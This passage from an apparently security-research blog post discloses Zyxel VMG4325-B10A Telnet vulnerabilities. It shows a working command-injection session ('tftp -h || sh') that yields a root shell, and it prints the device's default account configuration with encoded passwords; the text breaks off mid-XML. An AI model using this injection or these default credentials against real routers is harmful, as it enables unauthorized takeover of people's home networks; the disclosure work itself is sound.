This function is responsible for looking up commands and their associated functions within a large command table.",[18,55373,55374],{},[68,55375],{":width":10862,"alt":55376,"src":55377},"Decompiled CLI logic","\u002Fblog\u002Fzyxel-telnet-vulns\u002Fprocessclicmd.png",[18,55379,55380,55381,55383,55384,55387,55388,59],{},"However, some commands do not have built-in functions. For example, the following screenshot shows that the ",[886,55382,22966],{}," command is handled by ",[886,55385,55386],{},"FUN_0001b5a8"," but there is no function associated with ",[886,55389,55390],{},"ifconfig",[18,55392,55393],{},[68,55394],{":width":10862,"alt":55395,"src":55396},"Decompiled Command Table","\u002Fblog\u002Fzyxel-telnet-vulns\u002Fclitable.png",[18,55398,55399,55400,55402,55403,55406,55407,55409,55410,55412,55413,55415,55416,50864,55419,59],{},"Instead, ",[886,55401,55390],{}," is passed to ",[886,55404,55405],{},"prctl_runCommandInShellWithTimeout",". This is where the trouble starts, because ",[886,55408,55366],{}," only verifies that the command starts with ",[886,55411,55390],{}," before invoking ",[886,55414,55405],{},", which is merely a thin wrapper around ",[886,55417,55418],{},"runCommandInShell",[886,55420,55421],{},"libcms_util.so",[18,55423,55424],{},[68,55425],{":width":10862,"alt":55426,"src":55427},"Decompiled runCommandInShell","\u002Fblog\u002Fzyxel-telnet-vulns\u002FrunCommand.png",[18,55429,55430,55431,55433,55434,55436],{},"The decompiled function above shows that ",[886,55432,55418],{}," has no filtering. As a result, Telnet commands that are passed to ",[886,55435,55405],{}," are vulnerable to command injection. 
The affected commands include:",[22,55438,55439,55442,55444,55446,55449,55452,55454],{},[25,55440,55441],{},"cat",[25,55443,55390],{},[25,55445,22770],{},[25,55447,55448],{},"ps",[25,55450,55451],{},"pwd",[25,55453,37669],{},[25,55455,55456],{},"wlctl",[18,55458,55459,55460,55463,55464,55466,55467,55470],{},"Because there is no filtering, the command injection can be executed in multiple ways. For example, the following uses ",[886,55461,55462],{},"||"," to execute additional commands after forcing ",[886,55465,37669],{}," to fail with the -",[886,55468,55469],{},"h"," flag:",[1354,55472,55476],{"className":55473,"code":55474,"language":55475,"meta":219,"style":219},"language-shell shiki shiki-themes material-theme-lighter github-light github-dark monokai","albinolobster@mournland:~$ telnet 192.168.0.1\nTrying 192.168.0.1...\nConnected to 192.168.0.1.\nEscape character is '^]'.\nZyxel VMG4325-B10A\nLogin: zyuser\nPassword:\n > tftp -h || sh\ntftp: invalid option -- h\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary.\n\nUsage: tftp [OPTIONS] HOST [PORT]\n\nTransfer a file from\u002Fto tftp server\n\nOptions:\n     -l FILE Local FILE\n     -r FILE Remote FILE\n     -g   Get file\n     -p   Put file\n     -g -t i -f filename server_ip   Get (flash) broadcom or whole image to modem\n     -g -t c -f filename server_ip   Get (flash) config file to modem\n     -p -t f -f filename server_ip   Put (backup) config file to tftpd server\n\n\n\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# ls -l\ndrwxr-xr-x 3 supervis root          0 Jan  1  1970 app\ndrwxr-xr-x 2 supervis root          0 Jun 15  2017 bin\n-rw-r--r-- 1 supervis root     163928 Jun 15  2017 cferam.000\ndrwxr-xr-x 4 supervis root          0 Jan  1  1970 data\ndrwxrwxr-x 4 supervis root          0 Jun 15  2017 dev\ndrwxr-xr-x   10 supervis root          0 Jun 15  2017 etc\ndrwxr-xr-x 2 supervis root          0 Jan  1  1970 
home\ndrwxrwxr-x 6 supervis root          0 Jun 15  2017 lib\nlrwxrwxrwx 1 supervis root         11 Jun 15  2017 linuxrc -> bin\u002Fbusybox\ndrwxr-xr-x 2 supervis root          0 Jan  1  1970 log\ndrwxr-xr-x 2 supervis root          0 Jan  3 20:29 mnt\ndrwxrwxr-x 5 supervis root          0 Jun 15  2017 opt\ndr-xr-xr-x   90 supervis root          0 Jan  1  1970 proc\ndrwxrwxr-x 2 supervis root          0 Jun 15  2017 sbin\ndrwxr-xr-x   11 supervis root          0 Jan  1  1970 sys\nlrwxrwxrwx 1 supervis root          8 Jun 15  2017 tmp -> \u002Fvar\u002Ftmp\ndrwxrwxr-x 4 supervis root          0 Jun 15  2017 usr\ndrwxr-xr-x   14 supervis root          0 Jan  3 22:09 var\n-rw-rw-r-- 1 supervis root    1446798 Jun 15  2017 vmlinux.lz\ndrwxrwxr-x 4 supervis root          0 Jun 15  2017 webs\n#\n","shell",[886,55477,55478,55489,55497,55507,55528,55536,55544,55549,55564,55581,55601,55605,55622,55626,55643,55647,55652,55666,55678,55689,55699,55722,55742,55762,55766,55770,55774,55794,55822,55826,55831,55860,55884,55907,55929,55951,55973,55994,56016,56046,56067,56090,56111,56134,56155,56177,56206,56227,56250,56273,56294],{"__ignoreMap":219},[1373,55479,55480,55483,55486],{"class":1375,"line":1376},[1373,55481,55482],{"class":2206},"albinolobster@mournland:~$",[1373,55484,55485],{"class":1391}," telnet",[1373,55487,55488],{"class":5467}," 192.168.0.1\n",[1373,55490,55491,55494],{"class":1375,"line":220},[1373,55492,55493],{"class":2206},"Trying",[1373,55495,55496],{"class":1391}," 192.168.0.1...\n",[1373,55498,55499,55501,55504],{"class":1375,"line":1266},[1373,55500,19141],{"class":2206},[1373,55502,55503],{"class":1391}," to",[1373,55505,55506],{"class":1391}," 192.168.0.1.\n",[1373,55508,55509,55512,55515,55518,55520,55523,55525],{"class":1375,"line":1852},[1373,55510,55511],{"class":2206},"Escape",[1373,55513,55514],{"class":1391}," character",[1373,55516,55517],{"class":1391}," 
is",[1373,55519,4713],{"class":1387},[1373,55521,55522],{"class":1391},"^]",[1373,55524,1388],{"class":1387},[1373,55526,55527],{"class":1391},".\n",[1373,55529,55530,55533],{"class":1375,"line":4692},[1373,55531,55532],{"class":2206},"Zyxel",[1373,55534,55535],{"class":1391}," VMG4325-B10A\n",[1373,55537,55538,55541],{"class":1375,"line":4724},[1373,55539,55540],{"class":2206},"Login:",[1373,55542,55543],{"class":1391}," zyuser\n",[1373,55545,55546],{"class":1375,"line":4756},[1373,55547,55548],{"class":2206},"Password:\n",[1373,55550,55551,55553,55556,55559,55561],{"class":1375,"line":4768},[1373,55552,11741],{"class":1397},[1373,55554,55555],{"class":2206}," tftp",[1373,55557,55558],{"class":2209}," -h",[1373,55560,2219],{"class":1397},[1373,55562,55563],{"class":2206}," sh\n",[1373,55565,55566,55569,55572,55575,55578],{"class":1375,"line":4792},[1373,55567,55568],{"class":2206},"tftp:",[1373,55570,55571],{"class":1391}," invalid",[1373,55573,55574],{"class":1391}," option",[1373,55576,55577],{"class":2209}," --",[1373,55579,55580],{"class":1391}," h\n",[1373,55582,55583,55586,55589,55592,55595,55598],{"class":1375,"line":4798},[1373,55584,55585],{"class":2206},"BusyBox",[1373,55587,55588],{"class":1391}," v1.17.2",[1373,55590,55591],{"class":4640}," (2017-06-15 ",[1373,55593,55594],{"class":1391},"12:25:20",[1373,55596,55597],{"class":1391}," CST",[1373,55599,55600],{"class":4640},") multi-call binary.\n",[1373,55602,55603],{"class":1375,"line":4806},[1373,55604,6520],{"emptyLinePlaceholder":237},[1373,55606,55607,55610,55612,55615,55617,55620],{"class":1375,"line":4817},[1373,55608,55609],{"class":2206},"Usage:",[1373,55611,55555],{"class":1391},[1373,55613,55614],{"class":4640}," [OPTIONS] HOST 
",[1373,55616,7035],{"class":1383},[1373,55618,55619],{"class":4640},"PORT",[1373,55621,7103],{"class":1383},[1373,55623,55624],{"class":1375,"line":4825},[1373,55625,6520],{"emptyLinePlaceholder":237},[1373,55627,55628,55631,55633,55635,55638,55640],{"class":1375,"line":4835},[1373,55629,55630],{"class":2206},"Transfer",[1373,55632,52105],{"class":1391},[1373,55634,8738],{"class":1391},[1373,55636,55637],{"class":1391}," from\u002Fto",[1373,55639,55555],{"class":1391},[1373,55641,55642],{"class":1391}," server\n",[1373,55644,55645],{"class":1375,"line":4843},[1373,55646,6520],{"emptyLinePlaceholder":237},[1373,55648,55649],{"class":1375,"line":4849},[1373,55650,55651],{"class":2206},"Options:\n",[1373,55653,55654,55657,55660,55663],{"class":1375,"line":4877},[1373,55655,55656],{"class":2206},"     -l",[1373,55658,55659],{"class":1391}," FILE",[1373,55661,55662],{"class":1391}," Local",[1373,55664,55665],{"class":1391}," FILE\n",[1373,55667,55668,55671,55673,55676],{"class":1375,"line":4915},[1373,55669,55670],{"class":2206},"     -r",[1373,55672,55659],{"class":1391},[1373,55674,55675],{"class":1391}," Remote",[1373,55677,55665],{"class":1391},[1373,55679,55680,55683,55686],{"class":1375,"line":4931},[1373,55681,55682],{"class":2206},"     -g",[1373,55684,55685],{"class":1391},"   Get",[1373,55687,55688],{"class":1391}," file\n",[1373,55690,55691,55694,55697],{"class":1375,"line":4947},[1373,55692,55693],{"class":2206},"     -p",[1373,55695,55696],{"class":1391},"   Put",[1373,55698,55688],{"class":1391},[1373,55700,55701,55703,55706,55708,55711,55714,55717,55719],{"class":1375,"line":4952},[1373,55702,55682],{"class":2206},[1373,55704,55705],{"class":2209}," -t",[1373,55707,38449],{"class":1391},[1373,55709,55710],{"class":2209}," -f",[1373,55712,55713],{"class":1391}," filename",[1373,55715,55716],{"class":1391}," server_ip",[1373,55718,55685],{"class":1391},[1373,55720,55721],{"class":4640}," (flash) broadcom or whole image to 
modem\n",[1373,55723,55724,55726,55728,55731,55733,55735,55737,55739],{"class":1375,"line":6776},[1373,55725,55682],{"class":2206},[1373,55727,55705],{"class":2209},[1373,55729,55730],{"class":1391}," c",[1373,55732,55710],{"class":2209},[1373,55734,55713],{"class":1391},[1373,55736,55716],{"class":1391},[1373,55738,55685],{"class":1391},[1373,55740,55741],{"class":4640}," (flash) config file to modem\n",[1373,55743,55744,55746,55748,55751,55753,55755,55757,55759],{"class":1375,"line":6781},[1373,55745,55693],{"class":2206},[1373,55747,55705],{"class":2209},[1373,55749,55750],{"class":1391}," f",[1373,55752,55710],{"class":2209},[1373,55754,55713],{"class":1391},[1373,55756,55716],{"class":1391},[1373,55758,55696],{"class":1391},[1373,55760,55761],{"class":4640}," (backup) config file to tftpd server\n",[1373,55763,55764],{"class":1375,"line":7524},[1373,55765,6520],{"emptyLinePlaceholder":237},[1373,55767,55768],{"class":1375,"line":7530},[1373,55769,6520],{"emptyLinePlaceholder":237},[1373,55771,55772],{"class":1375,"line":7546},[1373,55773,6520],{"emptyLinePlaceholder":237},[1373,55775,55776,55778,55780,55782,55784,55786,55789,55792],{"class":1375,"line":7571},[1373,55777,55585],{"class":2206},[1373,55779,55588],{"class":1391},[1373,55781,55591],{"class":4640},[1373,55783,55594],{"class":1391},[1373,55785,55597],{"class":1391},[1373,55787,55788],{"class":4640},") built-in shell (",[1373,55790,55791],{"class":2206},"ash",[1373,55793,11875],{"class":4640},[1373,55795,55796,55799,55801,55803,55805,55808,55810,55813,55816,55819],{"class":1375,"line":7598},[1373,55797,55798],{"class":2206},"Enter",[1373,55800,4713],{"class":1387},[1373,55802,39134],{"class":1391},[1373,55804,1388],{"class":1387},[1373,55806,55807],{"class":1391}," for",[1373,55809,52105],{"class":1391},[1373,55811,55812],{"class":1391}," list",[1373,55814,55815],{"class":1391}," of",[1373,55817,55818],{"class":1391}," built-in",[1373,55820,55821],{"class":1391}," 
commands.\n",[1373,55823,55824],{"class":1375,"line":7615},[1373,55825,6520],{"emptyLinePlaceholder":237},[1373,55827,55828],{"class":1375,"line":7635},[1373,55829,55830],{"class":4630},"# ls -l\n",[1373,55832,55833,55836,55839,55842,55845,55848,55851,55854,55857],{"class":1375,"line":7640},[1373,55834,55835],{"class":2206},"drwxr-xr-x",[1373,55837,55838],{"class":5467}," 3",[1373,55840,55841],{"class":1391}," supervis",[1373,55843,55844],{"class":1391}," root",[1373,55846,55847],{"class":5467},"          0",[1373,55849,55850],{"class":1391}," Jan",[1373,55852,55853],{"class":5467},"  1",[1373,55855,55856],{"class":5467},"  1970",[1373,55858,55859],{"class":1391}," app\n",[1373,55861,55862,55864,55866,55868,55870,55872,55875,55878,55881],{"class":1375,"line":7648},[1373,55863,55835],{"class":2206},[1373,55865,5499],{"class":5467},[1373,55867,55841],{"class":1391},[1373,55869,55844],{"class":1391},[1373,55871,55847],{"class":5467},[1373,55873,55874],{"class":1391}," Jun",[1373,55876,55877],{"class":5467}," 15",[1373,55879,55880],{"class":5467},"  2017",[1373,55882,55883],{"class":1391}," bin\n",[1373,55885,55886,55889,55891,55893,55895,55898,55900,55902,55904],{"class":1375,"line":7672},[1373,55887,55888],{"class":2206},"-rw-r--r--",[1373,55890,5468],{"class":5467},[1373,55892,55841],{"class":1391},[1373,55894,55844],{"class":1391},[1373,55896,55897],{"class":5467},"     163928",[1373,55899,55874],{"class":1391},[1373,55901,55877],{"class":5467},[1373,55903,55880],{"class":5467},[1373,55905,55906],{"class":1391}," cferam.000\n",[1373,55908,55909,55911,55914,55916,55918,55920,55922,55924,55926],{"class":1375,"line":7688},[1373,55910,55835],{"class":2206},[1373,55912,55913],{"class":5467}," 4",[1373,55915,55841],{"class":1391},[1373,55917,55844],{"class":1391},[1373,55919,55847],{"class":5467},[1373,55921,55850],{"class":1391},[1373,55923,55853],{"class":5467},[1373,55925,55856],{"class":5467},[1373,55927,55928],{"class":1391}," 
data\n",[1373,55930,55931,55934,55936,55938,55940,55942,55944,55946,55948],{"class":1375,"line":7709},[1373,55932,55933],{"class":2206},"drwxrwxr-x",[1373,55935,55913],{"class":5467},[1373,55937,55841],{"class":1391},[1373,55939,55844],{"class":1391},[1373,55941,55847],{"class":5467},[1373,55943,55874],{"class":1391},[1373,55945,55877],{"class":5467},[1373,55947,55880],{"class":5467},[1373,55949,55950],{"class":1391}," dev\n",[1373,55952,55953,55955,55958,55960,55962,55964,55966,55968,55970],{"class":1375,"line":7714},[1373,55954,55835],{"class":2206},[1373,55956,55957],{"class":5467},"   10",[1373,55959,55841],{"class":1391},[1373,55961,55844],{"class":1391},[1373,55963,55847],{"class":5467},[1373,55965,55874],{"class":1391},[1373,55967,55877],{"class":5467},[1373,55969,55880],{"class":5467},[1373,55971,55972],{"class":1391}," etc\n",[1373,55974,55975,55977,55979,55981,55983,55985,55987,55989,55991],{"class":1375,"line":7722},[1373,55976,55835],{"class":2206},[1373,55978,5499],{"class":5467},[1373,55980,55841],{"class":1391},[1373,55982,55844],{"class":1391},[1373,55984,55847],{"class":5467},[1373,55986,55850],{"class":1391},[1373,55988,55853],{"class":5467},[1373,55990,55856],{"class":5467},[1373,55992,55993],{"class":1391}," home\n",[1373,55995,55996,55998,56001,56003,56005,56007,56009,56011,56013],{"class":1375,"line":9903},[1373,55997,55933],{"class":2206},[1373,55999,56000],{"class":5467}," 6",[1373,56002,55841],{"class":1391},[1373,56004,55844],{"class":1391},[1373,56006,55847],{"class":5467},[1373,56008,55874],{"class":1391},[1373,56010,55877],{"class":5467},[1373,56012,55880],{"class":5467},[1373,56014,56015],{"class":1391}," lib\n",[1373,56017,56018,56021,56023,56025,56027,56030,56032,56034,56036,56039,56041,56043],{"class":1375,"line":9908},[1373,56019,56020],{"class":2206},"lrwxrwxrwx",[1373,56022,5468],{"class":5467},[1373,56024,55841],{"class":1391},[1373,56026,55844],{"class":1391},[1373,56028,56029],{"class":5467},"         
11",[1373,56031,55874],{"class":1391},[1373,56033,55877],{"class":5467},[1373,56035,55880],{"class":5467},[1373,56037,56038],{"class":1391}," linuxrc",[1373,56040,27425],{"class":4640},[1373,56042,5384],{"class":1397},[1373,56044,56045],{"class":1391}," bin\u002Fbusybox\n",[1373,56047,56048,56050,56052,56054,56056,56058,56060,56062,56064],{"class":1375,"line":9913},[1373,56049,55835],{"class":2206},[1373,56051,5499],{"class":5467},[1373,56053,55841],{"class":1391},[1373,56055,55844],{"class":1391},[1373,56057,55847],{"class":5467},[1373,56059,55850],{"class":1391},[1373,56061,55853],{"class":5467},[1373,56063,55856],{"class":5467},[1373,56065,56066],{"class":1391}," log\n",[1373,56068,56069,56071,56073,56075,56077,56079,56081,56084,56087],{"class":1375,"line":9932},[1373,56070,55835],{"class":2206},[1373,56072,5499],{"class":5467},[1373,56074,55841],{"class":1391},[1373,56076,55844],{"class":1391},[1373,56078,55847],{"class":5467},[1373,56080,55850],{"class":1391},[1373,56082,56083],{"class":5467},"  3",[1373,56085,56086],{"class":1391}," 20:29",[1373,56088,56089],{"class":1391}," mnt\n",[1373,56091,56092,56094,56096,56098,56100,56102,56104,56106,56108],{"class":1375,"line":9937},[1373,56093,55933],{"class":2206},[1373,56095,17176],{"class":5467},[1373,56097,55841],{"class":1391},[1373,56099,55844],{"class":1391},[1373,56101,55847],{"class":5467},[1373,56103,55874],{"class":1391},[1373,56105,55877],{"class":5467},[1373,56107,55880],{"class":5467},[1373,56109,56110],{"class":1391}," opt\n",[1373,56112,56113,56116,56119,56121,56123,56125,56127,56129,56131],{"class":1375,"line":9957},[1373,56114,56115],{"class":2206},"dr-xr-xr-x",[1373,56117,56118],{"class":5467},"   90",[1373,56120,55841],{"class":1391},[1373,56122,55844],{"class":1391},[1373,56124,55847],{"class":5467},[1373,56126,55850],{"class":1391},[1373,56128,55853],{"class":5467},[1373,56130,55856],{"class":5467},[1373,56132,56133],{"class":1391}," 
proc\n",[1373,56135,56136,56138,56140,56142,56144,56146,56148,56150,56152],{"class":1375,"line":9962},[1373,56137,55933],{"class":2206},[1373,56139,5499],{"class":5467},[1373,56141,55841],{"class":1391},[1373,56143,55844],{"class":1391},[1373,56145,55847],{"class":5467},[1373,56147,55874],{"class":1391},[1373,56149,55877],{"class":5467},[1373,56151,55880],{"class":5467},[1373,56153,56154],{"class":1391}," sbin\n",[1373,56156,56157,56159,56162,56164,56166,56168,56170,56172,56174],{"class":1375,"line":15955},[1373,56158,55835],{"class":2206},[1373,56160,56161],{"class":5467},"   11",[1373,56163,55841],{"class":1391},[1373,56165,55844],{"class":1391},[1373,56167,55847],{"class":5467},[1373,56169,55850],{"class":1391},[1373,56171,55853],{"class":5467},[1373,56173,55856],{"class":5467},[1373,56175,56176],{"class":1391}," sys\n",[1373,56178,56179,56181,56183,56185,56187,56190,56192,56194,56196,56199,56201,56203],{"class":1375,"line":16030},[1373,56180,56020],{"class":2206},[1373,56182,5468],{"class":5467},[1373,56184,55841],{"class":1391},[1373,56186,55844],{"class":1391},[1373,56188,56189],{"class":5467},"          8",[1373,56191,55874],{"class":1391},[1373,56193,55877],{"class":5467},[1373,56195,55880],{"class":5467},[1373,56197,56198],{"class":1391}," tmp",[1373,56200,27425],{"class":4640},[1373,56202,5384],{"class":1397},[1373,56204,56205],{"class":1391}," \u002Fvar\u002Ftmp\n",[1373,56207,56208,56210,56212,56214,56216,56218,56220,56222,56224],{"class":1375,"line":16035},[1373,56209,55933],{"class":2206},[1373,56211,55913],{"class":5467},[1373,56213,55841],{"class":1391},[1373,56215,55844],{"class":1391},[1373,56217,55847],{"class":5467},[1373,56219,55874],{"class":1391},[1373,56221,55877],{"class":5467},[1373,56223,55880],{"class":5467},[1373,56225,56226],{"class":1391}," usr\n",[1373,56228,56229,56231,56234,56236,56238,56240,56242,56244,56247],{"class":1375,"line":16083},[1373,56230,55835],{"class":2206},[1373,56232,56233],{"class":5467},"   
14",[1373,56235,55841],{"class":1391},[1373,56237,55844],{"class":1391},[1373,56239,55847],{"class":5467},[1373,56241,55850],{"class":1391},[1373,56243,56083],{"class":5467},[1373,56245,56246],{"class":1391}," 22:09",[1373,56248,56249],{"class":1391}," var\n",[1373,56251,56252,56255,56257,56259,56261,56264,56266,56268,56270],{"class":1375,"line":16098},[1373,56253,56254],{"class":2206},"-rw-rw-r--",[1373,56256,5468],{"class":5467},[1373,56258,55841],{"class":1391},[1373,56260,55844],{"class":1391},[1373,56262,56263],{"class":5467},"    1446798",[1373,56265,55874],{"class":1391},[1373,56267,55877],{"class":5467},[1373,56269,55880],{"class":5467},[1373,56271,56272],{"class":1391}," vmlinux.lz\n",[1373,56274,56275,56277,56279,56281,56283,56285,56287,56289,56291],{"class":1375,"line":16103},[1373,56276,55933],{"class":2206},[1373,56278,55913],{"class":5467},[1373,56280,55841],{"class":1391},[1373,56282,55844],{"class":1391},[1373,56284,55847],{"class":5467},[1373,56286,55874],{"class":1391},[1373,56288,55877],{"class":5467},[1373,56290,55880],{"class":5467},[1373,56292,56293],{"class":1391}," webs\n",[1373,56295,56296],{"class":1375,"line":16147},[1373,56297,56298],{"class":4630},"#\n",[18,56300,56301,56302,59],{},"This technique can be repeated against the other affected commands using various combinations of ",[47,56303,56306],{"href":56304,"rel":56305},"https:\u002F\u002Fwww.gnu.org\u002Fsoftware\u002Fbash\u002Fmanual\u002Fhtml_node\u002FDefinitions.html#index-metacharacter",[51],"shell metacharacters",[1920,56308,56310],{"id":56309},"cve-2025-0890-default-credentials","CVE-2025-0890: Default Credentials",[18,56312,56313,56314,56319,56320,56323],{},"By itself, an authenticated command injection has limited value to an attacker—especially over Telnet, which ideally should not be exposed to the internet (though, in reality, ",[47,56315,56318],{"href":56316,"rel":56317},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=cHJvdG9jb2w9InRlbG5ldCI%3D",[51],"millions"," of 
devices are). The impact of CVE-2024-40891 depends heavily on an authentication bypass or default credentials. Unfortunately, these affected devices appear to be provisioned with default accounts, all of which can be found in the device’s ",[886,56321,56322],{},"\u002Fetc\u002Fdefault.cfg"," file. Here is a snippet from our VMG4325-B10A:",[1354,56325,56329],{"className":56326,"code":56327,"language":56328,"meta":219,"style":219},"language-xml shiki shiki-themes material-theme-lighter github-light github-dark monokai","\u003CX_404A03_LoginCfg>\n    \u003CAdminUserName>supervisor\u003C\u002FAdminUserName>\n    \u003CAdminPassword>enlhZDEyMzQ=\u003C\u002FAdminPassword>\n\u003CX_404A03_LoginGroupNumberOfEntries>2\u003C\u002FX_404A03_LoginGroupNumberOfEntries>\n\u003CX_404A03_Login_Group instance=\"1\">\n    \u003CPrivilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp\u003C\u002FPrivilege>\n    \u003CName>Administrator\u003C\u002FName>\n    \u003CConsoleLevel>2\u003C\u002FConsoleLevel>\n    \u003CUse_Login_Info instance=\"1\">\n    \u003CUserName>admin\u003C\u002FUserName>\n    \u003CPassword>MTIzNAA=\u003C\u002FPassword>\n    \u003CLoginFailCount>0\u003C\u002FLoginFailCount>\n    \u003CLoginFailCountLeft>1\u003C\u002FLoginFailCountLeft>\n    \u003C\u002FUse_Login_Info>\n    \u003CUse_Login_Info nextInstance=\"2\" >\u003C\u002FUse_Login_Info>\n\u003C\u002FX_404A03_Login_Group>\n\u003CX_404A03_Login_Group instance=\"2\">\n    \u003CGroupKey>2\u003C\u002FGroupKey>\n    
\u003CPrivilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp\u003C\u002FPrivilege>\n    \u003CName>User\u003C\u002FName>\n    \u003CConsoleLevel>2\u003C\u002FConsoleLevel>\n    \u003CUse_Login_Info instance=\"1\">\n    \u003CUserName>zyuser\u003C\u002FUserName>\n    \u003CPassword>MTIzNAA=\u003C\u002FPassword>\n    \u003CLoginFailCount>0\u003C\u002FLoginFailCount>\n    \u003CLoginFailCountLeft>1\u003C\u002FLoginFailCountLeft>\n    \u003C\u002FUse_Login_Info>\n    \u003CUse_Login_Info nextInstance=\"2\" >\u003C\u002FUse_Login_Info>\n\u003C\u002FX_404A03_Login_Group>\n\u003CX_404A03_Login_Group nextInstance=\"3\" >\u003C\u002FX_404A03_Login_Group>\n\u003C\u002FX_404A03_LoginCfg>\n","xml",[886,56330,56331,56340,56358,56376,56393,56413,56431,56448,56465,56484,56501,56519,56536,56553,56562,56586,56594,56612,56629,56645,56662,56678,56696,56713,56729,56745,56761,56769,56791,56799,56821],{"__ignoreMap":219},[1373,56332,56333,56335,56338],{"class":1375,"line":1376},[1373,56334,11852],{"class":1383},[1373,56336,56337],{"class":6300},"X_404A03_LoginCfg",[1373,56339,6765],{"class":1383},[1373,56341,56342,56344,56347,56349,56352,56354,56356],{"class":1375,"line":220},[1373,56343,8246],{"class":1383},[1373,56345,56346],{"class":6300},"AdminUserName",[1373,56348,5384],{"class":1383},[1373,56350,56351],{"class":4640},"supervisor",[1373,56353,46627],{"class":1383},[1373,56355,56346],{"class":6300},[1373,56357,6765],{"class":1383},[1373,56359,56360,56362,56365,56367,56370,56372,56374],{"class":1375,"line":1266},[1373,56361,8246],{"class":1383},[1373,56363,56364],{"class":6300},"AdminPassword",[1373,56366,5384],{"class":1383},[1373,56368,56
369],{"class":4640},"enlhZDEyMzQ=",[1373,56371,46627],{"class":1383},[1373,56373,56364],{"class":6300},[1373,56375,6765],{"class":1383},[1373,56377,56378,56380,56383,56385,56387,56389,56391],{"class":1375,"line":1852},[1373,56379,11852],{"class":1383},[1373,56381,56382],{"class":6300},"X_404A03_LoginGroupNumberOfEntries",[1373,56384,5384],{"class":1383},[1373,56386,353],{"class":4640},[1373,56388,46627],{"class":1383},[1373,56390,56382],{"class":6300},[1373,56392,6765],{"class":1383},[1373,56394,56395,56397,56400,56403,56405,56407,56409,56411],{"class":1375,"line":4692},[1373,56396,11852],{"class":1383},[1373,56398,56399],{"class":6300},"X_404A03_Login_Group",[1373,56401,56402],{"class":8252}," instance",[1373,56404,5417],{"class":1383},[1373,56406,183],{"class":1387},[1373,56408,467],{"class":1391},[1373,56410,183],{"class":1387},[1373,56412,6765],{"class":1383},[1373,56414,56415,56417,56420,56422,56425,56427,56429],{"class":1375,"line":4724},[1373,56416,8246],{"class":1383},[1373,56418,56419],{"class":6300},"Privilege",[1373,56421,5384],{"class":1383},[1373,56423,56424],{"class":4640},"broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp",[1373,56426,46627],{"class":1383},[1373,56428,56419],{"class":6300},[1373,56430,6765],{"class":1383},[1373,56432,56433,56435,56437,56439,56442,56444,56446],{"class":1375,"line":4756},[1373,56434,8246],{"class":1383},[1373,56436,30775],{"class":6300},[1373,56438,5384],{"class":1383},[1373,56440,56441],{"class":4640},"Administrator",[1373,56443,46627],{"class":1383},[1373,56445,30775],{"class":6300},[1373,56447,6765],{"class":1383},[1373,56449,56450,56452,56455,56457,56459,56461,56463],{"class":
1375,"line":4768},[1373,56451,8246],{"class":1383},[1373,56453,56454],{"class":6300},"ConsoleLevel",[1373,56456,5384],{"class":1383},[1373,56458,353],{"class":4640},[1373,56460,46627],{"class":1383},[1373,56462,56454],{"class":6300},[1373,56464,6765],{"class":1383},[1373,56466,56467,56469,56472,56474,56476,56478,56480,56482],{"class":1375,"line":4792},[1373,56468,8246],{"class":1383},[1373,56470,56471],{"class":6300},"Use_Login_Info",[1373,56473,56402],{"class":8252},[1373,56475,5417],{"class":1383},[1373,56477,183],{"class":1387},[1373,56479,467],{"class":1391},[1373,56481,183],{"class":1387},[1373,56483,6765],{"class":1383},[1373,56485,56486,56488,56491,56493,56495,56497,56499],{"class":1375,"line":4798},[1373,56487,8246],{"class":1383},[1373,56489,56490],{"class":6300},"UserName",[1373,56492,5384],{"class":1383},[1373,56494,5800],{"class":4640},[1373,56496,46627],{"class":1383},[1373,56498,56490],{"class":6300},[1373,56500,6765],{"class":1383},[1373,56502,56503,56505,56508,56510,56513,56515,56517],{"class":1375,"line":4806},[1373,56504,8246],{"class":1383},[1373,56506,56507],{"class":6300},"Password",[1373,56509,5384],{"class":1383},[1373,56511,56512],{"class":4640},"MTIzNAA=",[1373,56514,46627],{"class":1383},[1373,56516,56507],{"class":6300},[1373,56518,6765],{"class":1383},[1373,56520,56521,56523,56526,56528,56530,56532,56534],{"class":1375,"line":4817},[1373,56522,8246],{"class":1383},[1373,56524,56525],{"class":6300},"LoginFailCount",[1373,56527,5384],{"class":1383},[1373,56529,445],{"class":4640},[1373,56531,46627],{"class":1383},[1373,56533,56525],{"class":6300},[1373,56535,6765],{"class":1383},[1373,56537,56538,56540,56543,56545,56547,56549,56551],{"class":1375,"line":4825},[1373,56539,8246],{"class":1383},[1373,56541,56542],{"class":6300},"LoginFailCountLeft",[1373,56544,5384],{"class":1383},[1373,56546,467],{"class":4640},[1373,56548,46627],{"class":1383},[1373,56550,56542],{"class":6300},[1373,56552,6765],{"class":1383},[1373,56554,56555,56558,56560],{
